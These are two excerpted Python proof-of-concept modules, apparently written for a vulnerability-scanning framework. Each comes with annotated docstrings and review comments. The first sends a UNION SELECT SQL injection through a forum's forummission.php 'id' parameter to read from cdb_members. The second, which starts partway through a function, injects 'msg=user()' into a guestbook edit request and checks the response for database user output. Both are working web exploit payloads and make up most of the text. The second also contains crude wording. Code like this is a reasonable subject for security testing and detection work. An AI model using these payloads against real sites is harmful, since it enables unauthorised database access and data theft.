Example #1
    # Sample sites against which the check can be examined; this listing
    # carries a single empty-string placeholder rather than a real host.
    samples = ['']

    def _verify(self):
        """Check whether the target's forummission.php ``id`` parameter is injectable.

        One GET request is sent whose ``id`` value carries a UNION SELECT
        asking the database to concat() three hex-encoded fragments. They
        decode to ``qbxvq`` + ``PfNhXNLXCR`` + ``qjqqq``. The request itself
        only ever contains the hex form, so the plain marker can show up in
        the response only if the database evaluated the injected expression,
        not because the page echoed the URL back.

        The same hex fragments in the ``id`` query parameter are what a
        defender would look for in access logs to recognise this probe.

        Returns:
            The object built by ``self.parse_attack`` from the result dict.
            The dict holds ``VerifyInfo.URL`` when the marker was found and
            is empty otherwise.
        """
        # Read-only probe: the injected query selects a constant marker into
        # the third of eleven UNION columns, reading from cdb_members.
        injected_path = "/forummission.php?index=show&id=24 and+1=2+union+select+1,2,concat(0x7162787671,0x50664e68584e4c584352,0x716a717171),4,5,6,7,8,9,10,11 from cdb_members--"
        probe_url = self.url + injected_path

        # NOTE(review): no exception handling or status-code check here, so a
        # connection error or timeout propagates to the caller.
        reply = req.get(probe_url, headers=self.headers, timeout=10)

        # A special string is concatenated server-side; finding it proves
        # that the concat() call was actually executed.
        findings = {}
        if 'qbxvqPfNhXNLXCRqjqqq' in reply.text:
            findings['VerifyInfo'] = {'URL': probe_url}
        return self.parse_attack(findings)

    def _attack(self):
        """Attack-mode entry point; behaves exactly like verify mode.

        No separate exploitation step exists in this PoC: the call is
        forwarded to ``_verify`` and its return value is handed back unchanged.
        """
        outcome = self._verify()
        return outcome

    def parse_attack(self, result):
        """Wrap a verification result dict in an ``Output`` object.

        Args:
            result: Dict built by ``_verify``; an empty dict means the marker
                string was not found in the response.

        Returns:
            The ``Output`` instance, after ``success(result)`` for a truthy
            result or ``fail(...)`` for a falsy one.
        """
        report = Output(self)
        if not result:
            # NOTE(review): the message reads like a network failure, but this
            # branch is taken for any falsy result, including a target that
            # answered normally and simply did not return the marker.
            report.fail('Internet Nothing returned')
            return report
        report.success(result)
        return report


# Runs at import time and hands the PoC class to register().
# NOTE(review): register() is defined outside this excerpt; presumably it
# adds the class to the framework's list of runnable PoCs. Confirm.
register(TestPOC)
Example #2
                msgid = line.get('href')[30:]
                break
        if msgid == None:
            print("No msgid find,don't f**k this vulu")
        payload = self.url + "/plus/guestbook.php?action=admin&job=editok&id={0}&msg=',msg=user(),email='".format(
            msgid)
        req.get(target)
        target = self.url + "/plus/guestbook.php"
        response = req.get(target)
        content = response.content
        for line in soup.findAll('td', attrs={'class': 'msgtd'}):
            if line.text.find('@localhost') >= 0:
                result = {'VerifyInfo': {}}
                result['VerifyInfo']['URL'] = self.url
                return self.parse_result(result)

    def _attack(self):
        """Attack-mode entry point; delegates straight to ``_verify``.

        Whatever ``_verify`` returns is passed back unchanged, so attack mode
        performs nothing beyond the verification check.
        """
        outcome = self._verify()
        return outcome

    def parse_result(self, result):
        """Convert a verification result dict into an ``Output`` object.

        Args:
            result: Dict describing the finding; a falsy value is reported as
                a failure.

        Returns:
            The ``Output`` instance, after ``success(result)`` for a truthy
            result or ``fail(...)`` for a falsy one.
        """
        report = Output(self)

        if not result:
            # NOTE(review): the wording suggests a network problem, but this
            # branch is taken for any falsy result.
            report.fail("Internet Nothing returned")
            return report
        report.success(result)
        return report


# Runs at import time and hands the PoC class to register().
# NOTE(review): register() is defined outside this excerpt; presumably it
# adds the class to the framework's list of runnable PoCs. Confirm.
register(Fuckdede)